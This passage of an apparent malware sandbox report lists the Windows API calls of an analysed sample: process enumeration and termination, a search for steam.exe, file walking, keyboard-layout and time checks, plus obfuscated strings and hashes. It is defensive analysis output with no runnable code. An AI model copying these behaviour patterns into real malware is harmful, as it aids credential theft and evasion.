                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: b3a7832161047b1fcb10a21110b0e79d5b36212d01f8ae2f4f41f02df0d6c42a
                                • Instruction ID: d0d1bb37d2db5da67252bab9e29f87a40fe6bd287551079b58b8257e883a8058
                                • Opcode Fuzzy Hash: b3a7832161047b1fcb10a21110b0e79d5b36212d01f8ae2f4f41f02df0d6c42a
                                • Instruction Fuzzy Hash: 67415E32512A19ABCF33EF29DC8AE9F77A4EF15304F055164F84A9B252CF349C158B94
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003B46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 003B46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 003B46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B4711
                                • CloseHandle.KERNEL32(00000000), ref: 003B4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B4726
                                • CloseHandle.KERNEL32(00000000), ref: 003B4731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: a40d5d74709caf1f523850a598a16bd833d6ce8371eb256d31269c9d8bb1d28a
                                • Instruction ID: 79a5a39ab2ce0c030aa0bc7451dce82cbbb166c1dc8a4cf046e71d9ba3f09038
                                • Opcode Fuzzy Hash: a40d5d74709caf1f523850a598a16bd833d6ce8371eb256d31269c9d8bb1d28a
                                • Instruction Fuzzy Hash: 0501D232601524AFE7215B60DC8DFFA377CEB99B05F000088FA05E1180EF749989EBA5
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 003B4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 003B4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 003B4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B4672
                                • CloseHandle.KERNEL32(00000000), ref: 003B467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: 736069d192670cbf737aec108af9b598e4a2c846c2dba3a88f6ba5d3cd72a29e
                                • Instruction ID: 2a92ac13eb28b8f28aa40ea42f99a3f79736704df8ff0f8606328744c85784f0
                                • Opcode Fuzzy Hash: 736069d192670cbf737aec108af9b598e4a2c846c2dba3a88f6ba5d3cd72a29e
                                • Instruction Fuzzy Hash: 1701AD716015289FD721AB60AC4DFEA77BCEF19350F0001D9EE08E1040EF74DA989BE5
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4B7F
                                • lstrlen.KERNEL32(003C4CA8), ref: 003A4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BA7
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A4BFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 8b71c0e76cadf0997c533d2a3e35cb773cb73e465d9e9732d4b67d34ea55d263
                                • Instruction ID: 1127d08028988e992b2430a66cf1cb3ae6066d4a37be7743382af08208bddbda
                                • Opcode Fuzzy Hash: 8b71c0e76cadf0997c533d2a3e35cb773cb73e465d9e9732d4b67d34ea55d263
                                • Instruction Fuzzy Hash: 5E311B32522916ABCB23EF64EC8AE9F77A5AF91700F051124F8459B251CB70DC158BA4
                                APIs
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003B2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003B2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003B2DEC
                                • LocalFree.KERNEL32(00000000), ref: 003B2FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 77cbe64be01b4c2c11a782e279307be360d98e4843327a5bda5abecfca49a93c
                                • Instruction ID: a05851bb9ee65e48b05a621ae6aef9e5c3abed66fc6751a6f87950e773615f83
                                • Opcode Fuzzy Hash: 77cbe64be01b4c2c11a782e279307be360d98e4843327a5bda5abecfca49a93c
                                • Instruction Fuzzy Hash: 4FB1F870900614CFC716CF59C988BA6B7F1FF44318F2AC2A9D5099B6A2D776DD86CB80
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -Ztm$E/$W8w~$eI|S$e]w+$_?$_?
                                • API String ID: 0-682721128
                                • Opcode ID: 60fefdb01ba53f347ab81a4a9df1b43e51bf9fbfa5d4572b3f7cfb71ca648631
                                • Instruction ID: d86899546d01ca9c724b0d572cff2305e9200a53fe96e5b4e663d08a91337cb4
                                • Opcode Fuzzy Hash: 60fefdb01ba53f347ab81a4a9df1b43e51bf9fbfa5d4572b3f7cfb71ca648631
                                • Instruction Fuzzy Hash: 9EB2E5F3A0C204AFE304AE2DEC4577ABBE5EF94720F1A492DE6C4C3744E63598458696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ~\<$ES?$I\s}$S?_$S?_$S?_$]&s<
                                • API String ID: 0-935120390
                                • Opcode ID: 2331ecaeea34bc5cd0eea806dca3d79d1107b7c30c16b9087d0ff7cf9ac07d1c
                                • Instruction ID: 98df6a3529b264b4eb7d00a40e87a6a09e10728b1f07a8f0c55f71b3c9875dec
                                • Opcode Fuzzy Hash: 2331ecaeea34bc5cd0eea806dca3d79d1107b7c30c16b9087d0ff7cf9ac07d1c
                                • Instruction Fuzzy Hash: ED5209F360C200AFE3086E2DEC8567AB7D9EF94720F1A453DEAC5C3744EA3598158796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <4fo$R\|~$Sm~$cHp$2}$dk
                                • API String ID: 0-2237613122
                                • Opcode ID: ceb4074522a7cce60e5a759180b5d0330c3121a3da63757c489e6790ca560ae1
                                • Instruction ID: ecdcfff22f8d650b3a57d9ba17ad7d930fa04e550deffedc5b6ba5cd17aab1f6
                                • Opcode Fuzzy Hash: ceb4074522a7cce60e5a759180b5d0330c3121a3da63757c489e6790ca560ae1
                                • Instruction Fuzzy Hash: B4B238F3A0C2049FE3046F2DEC8567ABBE9EF94720F1A453DEAC5C3744EA3558058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "_fj$1=9$[>uo$d(z$d(z${C,
                                • API String ID: 0-2816934663
                                • Opcode ID: 7b615c33ae300f1c16d3e6079dd756b1486acd0f9d1bc47d701e24c36294d717
                                • Instruction ID: fe2248988ead46cefddd7b7a8e0c5dc2ff85afda0fb8e41c838a2f622876de05
                                • Opcode Fuzzy Hash: 7b615c33ae300f1c16d3e6079dd756b1486acd0f9d1bc47d701e24c36294d717
                                • Instruction Fuzzy Hash: CEB208F360C2049FE304AE2DEC8567AFBE9EFD4720F1A492DEAC4C7744E63558058696
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 003B2C58
                                • wsprintfA.USER32 ref: 003B2C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 011b2539de97e9d90aba4a957fa3374f6b0c79bec6db848e17cd059da7a8e846
                                • Instruction ID: cc02533ab3ac6ea7263d969a1411562fd8d5f18ac769303de1054359b4e10d8f
                                • Opcode Fuzzy Hash: 011b2539de97e9d90aba4a957fa3374f6b0c79bec6db848e17cd059da7a8e846
                                • Instruction Fuzzy Hash: 7601F271A00A04AFCB188B58DC0EFAABB69EB84721F004369F916DB6C0D77429088AD1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :]>$C"}$PA{s$oO?w$su/}
                                • API String ID: 0-3316869636
                                • Opcode ID: b4fcd7dc6527215cff40b1a81b676f8b1187f23f2bf83bdb58edd953730b369c
                                • Instruction ID: 904b8700e4c73e9e5d86e0e2858e91edfccf429f1ff496925e92e34bc0394c60
                                • Opcode Fuzzy Hash: b4fcd7dc6527215cff40b1a81b676f8b1187f23f2bf83bdb58edd953730b369c
                                • Instruction Fuzzy Hash: FBB204F390C2049FE3046F2DEC8567ABBE9EF94720F1A492DEAC483744EA3558448797
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 003B1B72
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B184F
                                  • Part of subcall function 003B1820: lstrlen.KERNEL32(00F66F50), ref: 003B1860
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B1887
                                  • Part of subcall function 003B1820: lstrcat.KERNEL32(00000000,00000000), ref: 003B1892
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B18C1
                                  • Part of subcall function 003B1820: lstrlen.KERNEL32(003C4FA0), ref: 003B18D3
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B18F4
                                  • Part of subcall function 003B1820: lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B1900
                                  • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B192F
                                • sscanf.NTDLL ref: 003B1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003B1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003B1BC6
                                • ExitProcess.KERNEL32 ref: 003B1BE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
